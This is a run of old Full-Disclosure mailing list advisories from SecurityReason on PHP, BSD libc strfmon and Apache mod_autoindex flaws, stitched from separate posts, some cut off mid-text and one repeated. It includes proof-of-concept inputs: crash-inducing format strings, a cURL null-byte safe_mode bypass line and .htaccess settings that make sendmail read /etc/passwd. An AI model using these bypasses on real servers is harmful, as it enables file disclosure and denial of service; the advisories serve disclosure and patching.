iD8DBQFIWCC+W1OhNJH6DMURAsq4AJ0eC1qKOZVOJJB3XDRIhpufNe1qUwCfTWv0
n4Sg31DePRpr4h3PLouKFoA=
=6qwD
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [securityreason] *BSD libc (strfmon) Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ *BSD libc (strfmon) Multiple vulnerabilities ]
Author: Maksymilian Arciemowicz (cxib)
SecurityReason.com
Date:
- - Written: 10.03.2008
- - Public: 25.03.2008
SecurityReason Research
SecurityAlert Id: 53
CVE: CVE-2008-1391
SecurityRisk: High
Affected Software:
FreeBSD lines: 6,7
NetBSD 4
another systems what use this functions.
Standard C Library (libc, -lc) for BSD
probably some MacOS version
Advisory URL:
http://securityreason.com/achievement_securityalert/53
Vendor: http://www.php.net
- --- 0.Description ---
strfmon -- convert monetary value to string
The strfmon() function places characters into the array pointed to by s as
controlled by the string pointed to by format. No more than maxsize bytes are
placed into the array.
The format string is composed of zero or more directives: ordinary characters
(not %), which are copied unchanged to the output stream; and conversion
specifications, each of which results in fetching zero or more subsequent
arguments. Each conversion specification is introduced by the % character.
SYNOPSIS:
#include
ssize_t
strfmon(char * restrict s, size_t maxsize, const char * restrict format,
...);
- --- 1. /usr/src/lib/libc/stdlib/strfmon.c - Integer Overflow ---
The main problem and vulnerability exist in strfmon() function. When we use
this function in example program:
- ---example-start--
#include
#include
int main(int argc, char* argv[]){
char buff[51];
char *bux=buff;
int res;
res=strfmon(bux, 50, argv[1], "0");
return 0;
}
- ---example-end--
and compile it, we can manipulate format string.
Let's try to run example:
cxib# ./pln %n
Segmentation fault (core dumped)
What is wrong? Let's see
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %n
Starting program: /cxib/C/pln %n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)
memmove() will bad reallocation memory.
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %.99n
Starting program: /cxib/C/pln %.99n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7
Next example is :
cxib# ./pln %#n
Long execution time. Let's try check this process :
- --
cxib# ps -aux | grep pln
cxib 1843 89.1 13.2 140320 119588 p2 R+4:29PM 0:09.68 ./pln
%#n
cxib# ps -aux | grep pln
cxib 1843 94.7 48.4 482336 438236 p2 R+4:29PM 1:54.07 ./pln
%#n
1 VSZ=140320
2 VSZ=482336
-
Why? pln will allocate more memory that we have. PHP use strfmon() in
money_format() function. When we use mod_php5 in apache, we can create example
exploit.. result will be :
- ---apache-child-die---
swap_pager: out of swap space
swap_pager_getswapspace(16): failed
Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap
space
- ---apache-child-die---
Difference between %n and (%#n or
%.99n) is "#" or "."
o A `#' sign followed by a decimal number specifying the maximum
expected number of digits after the radix character.
o A `.' character followed by a decimal number specifying the number
the number of digits after the radix character.
Let's see the source of strfmon() function :
- ---strfmon()-start---
ssize_t
strfmon(char * __restrict s, size_t maxsize, const char * __restrict format,
...)
{
va_list ap;
char*dst; /* output destination pointer */
const char *fmt; /* current format poistion pointer */
struct lconv*lc;/* pointer to lconv structure */
char*asciivalue;/* formatted double pointer */
int flags; /* formatting options */
int pad_char; /* padding character */
int pad_size; /* pad size */
int width; /* field width */
int left_prec; /* left precision */
int right_prec; /* right precision */
double value; /* just value */
charspace_char = ' '; /* space after currency */
charcs_precedes,/* values gathered from struct lconv */
sep_by_space,
sign_posn,
*signstr,
*currency_symbol;
char*tmpptr;/* temporary vars */
int
[Full-disclosure] {securityreason.com}PHP 5 *printf() - Integer Overflow
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]
Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com and SecurityReason.pl
Date:
- - Written: 01.03.2008
- - Public: 20.03.2008
SecurityReason Research
SecurityAlert Id: 52
CVE-2008-1384
SecurityRisk: Low
Affected Software: PHP 5.2.5 and prior
Advisory URL:
http://securityreason.com/achievement_securityalert/52
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.
These functions all manipulate strings in various ways. Some more
specialized sections can be found in the regular expression and URL
handling sections.
For information on how strings behave, especially with regard to usage of
single quotes, double quotes, and escape sequences, see the Strings entry
in the Types section of the manual.
- --- 1. *printf() functions Integer Overflow ---
The main problem exists in formatted_print.c file.
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52
UTC 2008 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/GENERIC i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php
cxib# php /www/printf.php
Segmentation fault (core dumped)
Good. Let's see to formatted_print.c file in php_sprintf_appendstring()
function
- ---formatted_print.c-start---
inline static void
php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add,
int min_width, int
max_width, char padding,
int alignment, int len, int
neg, int expprec, int always_sign)
- ---formatted_print.c-end---
The main varible what we will see is "npad"
- ---formatted_print.c-start---
copy_len = (expprec ? MIN(max_width, len) : len);
npad = min_width - copy_len;
- ---formatted_print.c-end---
good. npad is 2147483646
- ---formatted_print.c-start---
req_size = *pos + MAX(min_width, copy_len) + 1;
- ---formatted_print.c-end---
req_size overflow
- ---formatted_print.c-start---
if (req_size > *size) {
while (req_size > *size) {
*size <<= 1;
}
PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n",
*size));
*buffer = erealloc(*buffer, *size);
}
- ---formatted_print.c-end---
(req_size > *size) is False
(alignment == ALIGN_RIGHT) is True so
- ---formatted_print.c-start---
while (npad-- > 0) {
(*buffer)[(*pos)++] = padding;
}
- ---formatted_print.c-end---
and finish. Let's debug it with gdb
- --- Debug ---
0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c,
size=0xbfbfd324, add=0x28f20404 'A' ...,
min_width=2147483646, max_width=0, padding=65 'A', alignment=1, len=1,
neg=0, expprec=0, always_sign=0)
..
0x290fff0c: 'A' ...
0x290fffd4: 'A'
0x2910:
- --- Debug ---
Script will alocated a lot of data to memory.
Tested on:
PHP 5.2.5
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52
UTC 2008 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/GENERIC i386
and
PHP 5.1.6
[EMAIL PROTECTED] ~ $ uname -a
NetBSD ultra 3.0.1 NetBSD 3.0.1 (GENERIC) #0: Fri Jul 14 03:47:28 UTC 2006
[EMAIL PROTECTED]:/home/builds/ab/netbsd-3-0-1-RELEASE/sparc64/200607131826
Z-obj/home/builds/ab/netbsd-3-0-1-RELEASE/src/sys/arch/sparc64/compile/GENE
RIC sparc64
- --- 2. Exploit ---
SecurityReason will not public official exploit for this issue.
- --- 3. How to fix ---
CVS
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup
- --- 4. Greets ---
sp3x Infospec p_e_a Chujwamwdupe schain and Stanislav Malyshev (Patch)
- --- 5. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg [NEW KEY]
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg.old [OLD
KEY]
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.4 (FreeBSD)
iD8DBQFH4px5W1OhNJH6DMURAmHUAJ4hUxGFzSo8vqCH5QmR17uL5G4HdACfSFiI
w6hfbKzpzFcipScHzuATSME=
=suIH
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.5 cURL safe_mode bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[PHP 5.2.5 cURL safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- - Written: 21.08.2007
- - Public: 22.01.2008
SecurityReason Research
SecurityAlert Id: 51
CVE: CVE-2007-4850
SecurityRisk: Medium
Affected Software: PHP 5.2.4 and 5.2.5
Advisory URL:
http://securityreason.com/achievement_securityalert/51
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.
PHP supports libcurl, a library created by Daniel Stenberg, that allows you to
connect and communicate to many different types of servers with many different
types of protocols. libcurl currently supports the http, https, ftp, gopher,
telnet, dict, file, and ldap protocols. libcurl also supports HTTPS
certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with
PHP's ftp extension), HTTP form based upload, proxies, cookies, and
user+password authentication.
These functions have been added in PHP 4.0.2.
- --- 1. cURL ---
This is very similar to CVE-2006-2563.
http://securityreason.com/achievement_securityalert/39
The first issue [SAFE_MODE bypass]
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
is caused by error in curl/interface.c
- ---
#define PHP_CURL_CHECK_OPEN_BASEDIR(str, len, __ret)
\
if (((PG(open_basedir) && *PG(open_basedir)) || PG(safe_mode)) &&
\
strncasecmp(str, "file:", sizeof("file:") - 1) == 0)
\
{
\
php_url *tmp_url;
\
\
if (!(tmp_url = php_url_parse_ex(str, len))) {
\
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid
URL '%s'", str); \
php_curl_ret(__ret);
\
}
\
\
if (!php_memnstr(str, tmp_url->path, strlen(tmp_url->path), str
+ len)) { \
php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL '%s'
contains unencoded control characters", str); \
php_url_free(tmp_url);
\
php_curl_ret(__ret);
\
}
\
\
if (tmp_url->query || tmp_url->fragment ||
php_check_open_basedir(tmp_url->path TSRMLS_CC) ||
\
(PG(safe_mode) && !php_checkuid(tmp_url->path, "rb+",
CHECKUID_CHECK_MODE_PARAM)) \
) {
\
php_url_free(tmp_url);
\
php_curl_ret(__ret);
\
}
[Full-disclosure] PHP 5.2.4 mail.force_extra_parameters unsecure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.4 mail.force_extra_parameters unsecure ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - Written: 06.09.2007 - - Public: 0x.0x.2007 SecurityReason Research SecurityAlert Id: 47 CVE: CVE-2007-3378 SecurityRisk: Medium Affected Software: PHP <= 5.2.4 Advisory URL: http://securityreason.com/achievement_securityalert/47 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - --- 1. htaccess safemode and open_basedir Bypass Vulnerability per mail.force_extra_parameters --- We have recrived a lot of question about news http://securityreason.com/news/0/0x1f . And we will show How to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. But it is possible to bypass a safe_mode or open_basedir per mail.force_extra_parameters. In a lot of servers is sendmail, can be also exim etc. But we show how to exploit this for a famous mail server (SENDMAIL). For example you can set mail.force_extra_parameters via .htaccess. cxib# curl -I http://localhost:82 HTTP/1.1 200 OK Date: Thu, 06 Sep 2007 22:18:35 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4 Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT ETag: "27e4f0-2c-4c23b600" Accept-Ranges: bytes Content-Length: 44 Content-Type: text/html Apache 2.2.4 and PHP 5.2.4. Let's see folder "/narkotyk" in localhost:82. cxib# ls -la total 10 drwxrwxrwx 2 www www 512 Sep 7 00:26 . drwxr-xr-x 4 www wheel 512 Sep 7 00:22 .. - -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess - -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php - -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php cxib# cat file1.php cxib# curl http://localhost:82/narkotyk/file1.php Warning: include() [function.include]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/passwd owned by uid 0 in /usr/local/www/apache22/data/narkotyk/file1.php on line 1 Warning: include(/etc/passwd) [function.include]: failed to open stream: Invalid argument in /usr/local/www/apache22/data/narkotyk/file1.php on line 1 Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/local/www/apache22/data/narkotyk/file1.php on line 1 so safe_mode is open. Let's see files .htaccess and file2.php cxib# cat file2.php cxib# cat .htaccess php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt' and let's send request to file2.php cxib# curl http://localhost:82/narkotyk/file2.php bool(false) False!? No cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt - -rw-r--r-- 1 www www 7130 Sep 7 00:31 /usr/local/www/apache22/data/narkotyk/result.txt cxib# result.txt has been created. cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt 69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh" 69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:" etc. We can read file and safe_mode and open_basedir is bypassed. It is possible create file with php code. But we need have sendmail.cf to send email. Example: cxib# cat .htaccess php_value mail.force_extra_parameters '-C /usr/local/www/apache22/data/narkotyk/sendmail.cf -X /usr/local/www/apache22/data/narkotyk/phpcode.php' cxib# cat file3.php allo", "root")); ?> We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf and configure this file. Then cxib# curl http://localhost:8
[Full-disclosure] Apache2 Undefined Charset UTF-7 XSS Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [Apache2 Undefined Charset UTF-7 XSS Vulnerability ] Author: SecurityReason Maksymilian Arciemowicz (cXIb8O3) Date: - - Written: 08.08.2007 - - Public: 11.09.2007 SecurityReason Research SecurityAlert Id: 46 CVE: CVE-2007-4465 SecurityRisk: Low Affected Software: Apache 2.x (mod_autoindex) Advisory URL: http://securityreason.com/achievement_securityalert/46 Vendor: http://httpd.apache.org - --- 0.Description --- The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Apache has been the most popular web server on the Internet since April 1996. The November 2005 Netcraft Web Server Survey found that more than 70% of the web sites on the Internet are using Apache, thus making it more widely used than all other web servers combined. - --- 1. Apache2 XSS Undefined Charset UTF-7 XSS Vulnerability --- The XSS(UTF7) exist in mod_autoindex.c . Charset is not defined and we can provide XSS attack using "P" option available in apache 2.2.4 by setting Charset to UTF-7. "P=pattern lists only files matching the given pattern" More : http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html - -Source code from mod_autoindex.c-- #if APR_HAS_UNICODE_FS ap_set_content_type(r, "text/html;charset=utf-8"); #else ap_set_content_type(r, "text/html"); #endif - -Source code from mod_autoindex.c-- if APR_HAS_UNICODE_FS is set to 1 then we have defined charset and this is present on Windows systems . But on on unix , linux systems the charset is not definded. - --- EXAMPLE 1 --- # telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]' GET /icons/ http/1.1 Host: localhost Content-type: text/html Keep-Alive: 300 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 09 Aug 2007 01:01:48 GMT Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html Index of /icons Index of /icons .. - --- EXAMPLE 1 --- - --- EXAMPLE 2 --- # telnet httpd.apache.org 80 Trying 140.211.11.130... Connected to httpd.apache.org. Escape character is '^]'. GET /icons/ http/1.1 Host: httpd.apache.org Content-type: text/html Keep-Alive: 300 Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 08 Aug 2007 23:06:26 GMT Server: Apache/2.3.0-dev (Unix) Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html Index of /icons Index of /icons .. - --- EXAMPLE 2 --- Any request to folder /icons don't give charset in main header and in section. In requests like 400 404 etc charset is defined (standard UTF8). For example : - --- EXAMPLE 3 (400) --- # telnet 127.0.0.1 80 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. GET /%0 HTTP/1.1 Host: localhost HTTP/1.1 400 Bad Request Date: Thu, 09 Aug 2007 13:13:32 GMT Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 .. - --- EXAMPLE 3 --- - --- EXAMPLE 4 (404) --- # telnet 127.0.0.1 80 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. GET /noex HTTP/1.1 Host: localhost HTTP/1.1 404 Not Found Date: Thu, 09 Aug 2007 13:14:48 GMT Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 .. - --- EXAMPLE 4 --- Any request from family 4xx is defined with charset. Because it is possible put the text to site (like wrong patch) in 404. Main idea was that, anybody can't put any text to this site with folder. And it was good idea, but in apache 2.x exist option "P". Like: http://localhost/icons/?P=[Filter] Any value gived to this variable is displayed in html text. For example : http://localhost/icons/?P=Hallo - --- HTML Name - - - --- 2. Exploit --- SecurityReason is not going to release a exploit to the general public. Exploit was provided and tested for Apache Team . - --- 3. How to fix --- Update to Apache 2.2.6 http://www.apache.org/dist/httpd/CHANGES_2.2.6 - --- mod_autoindex: Add in Type and Charset options to IndexOptions directive. This allows the admin to explicitly set the content-type and charset of the generated page and is therefore a viable workaround for buggy browsers affected by CVE-2007-4465 (cve.mitre.org). [Jim Jagielski] - --- - --- 4. Greets --- For: sp3x, Infospec, p_e_a - --- 5. Contact --- Author: Securi
[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability
Source: http://securityreason.com/achievement_securityalert/45 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - Written: 10.02.2007 - - Public: 27.06.2007 SecurityReason Research SecurityAlert Id: 45 CVE: CVE-2007-3378 SecurityRisk: High Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7 Advisory URL: http://securityreason.com/achievement_securityalert/45 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - --- 1. htaccess safemode and open_basedir Bypass Vulnerability --- When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. These options are used by a lot of users to change permissions options like display_errors etc. But it is possible to bypass a safe_mode or open_basedir in different functions.For example you can set session.save_path via .htaccess. In function session_save_path() and ini_set() save_path is checked for safe_mode and open_basedir. In .htaccess it is bypassed. Values from .htaccess are not checked. For example: cxib# ls -la /www/cxib/ total 14 drwxr-xr-x 3 cxib www 512 Feb 16 20:20 . drwxr-xr-x 11 www www 7168 Feb 16 20:07 .. - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/stars.php cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:22:58 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Content-Length: 732 Content-Type: text/html Warning: session_save_path() [function.session-save-path]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 2 Warning: session_start() [function.session-start]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 3 Fatal error: session_start() [<a href='function.session-start'>function.session-start</a>]: Failed to initialize storage module: files (path: ) in /www/cxib/stars.php on line 3 Connection closed by foreign host. cxib# So we can't create session in directory. But when we create file .htaccess, we can write there: - --- php_value session.save_path /inne - --- cxib# ls -la /www/cxib/ total 16 drwxr-xr-x 3 cxib www 512 Feb 16 20:26 . drwxr-xr-x 11 www www 7168 Feb 16 20:26 .. - -rw-r--r-- 1 cxib www34 Feb 16 20:26 .htaccess - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/.htaccess php_value session.save_path /inne cxib# cat /www/cxib/stars.php We can't set session.save_path via ini_set() or session_save_path(). Let's try sending a request. cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:30:42 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0 Content-Type: text/html Connection closed by foreign host. cxib# cxib# ls -la /inne total 3 drwxrwxrwx 2 root wheel 512 Feb 16 20:30 . drwxr-xr
[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Source: http://securityreason.com/achievement_securityalert/45 - -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - - Written: 10.02.2007 - - - Public: 27.06.2007 SecurityReason Research SecurityAlert Id: 45 CVE: CVE-2007-3378 SecurityRisk: High Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7 Advisory URL: http://securityreason.com/achievement_securityalert/45 Vendor: http://www.php.net - - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - - --- 1. htaccess safemode and open_basedir Bypass Vulnerability --- When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. These options are used by a lot of users to change permissions options like display_errors etc. But it is possible to bypass a safe_mode or open_basedir in different functions.For example you can set session.save_path via .htaccess. In function session_save_path() and ini_set() save_path is checked for safe_mode and open_basedir. In .htaccess it is bypassed. Values from .htaccess are not checked. For example: cxib# ls -la /www/cxib/ total 14 drwxr-xr-x 3 cxib www 512 Feb 16 20:20 . drwxr-xr-x 11 www www 7168 Feb 16 20:07 .. - - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/stars.php cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:22:58 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Content-Length: 732 Content-Type: text/html Warning: session_save_path() [function.session-save-path]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 2 Warning: session_start() [function.session-start]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 3 Fatal error: session_start() [<a href='function.session-start'>function.session-start</a>]: Failed to initialize storage module: files (path: ) in /www/cxib/stars.php on line 3 Connection closed by foreign host. cxib# So we can't create session in directory. But when we create file .htaccess, we can write there: - - --- php_value session.save_path /inne - - --- cxib# ls -la /www/cxib/ total 16 drwxr-xr-x 3 cxib www 512 Feb 16 20:26 . drwxr-xr-x 11 www www 7168 Feb 16 20:26 .. - - -rw-r--r-- 1 cxib www34 Feb 16 20:26 .htaccess - - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/.htaccess php_value session.save_path /inne cxib# cat /www/cxib/stars.php We can't set session.save_path via ini_set() or session_save_path(). Let's try sending a request. cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:30:42 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0 Content-Type: text/html Connection closed by foreign host. cxib# cxib# ls -la /inne total 3 drwxrwxrwx 2 r
[Full-disclosure] PHP 5.2.0 session.save_path safe_mode and open_basedir bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[PHP 5.2.0 session.save_path safe_mode and open_basedir bypass]
Author: Maksymilian Arciemowicz (SecurityReason)
Date:
- - Written: 02.10.2006
- - Public: 08.12.2006
SecurityAlert Id: 43
CVE: CVE-2006-6383
SecurityRisk: High
Affected Software: PHP 5.2.0
Advisory URL: http://securityreason.com/achievement_securityalert/43
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.
A nice introduction to PHP by Stig Sather Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
Session support in PHP consists of a way to preserve certain data across
subsequent accesses. This enables you to build more customized applications and
increase the appeal of your web site.
A visitor accessing your web site is assigned a unique id, the so-called
session id. This is either stored in a cookie on the user side or is propagated
in the URL.
session.save_path defines the argument which is passed to the save handler. If
you choose the default files handler, this is the path where the files are
created. Defaults to /tmp. See also session_save_path().
There is an optional N argument to this directive that determines the number of
directory levels your session files will be spread around in. For example,
setting to '5;/tmp' may end up creating a session file and location like
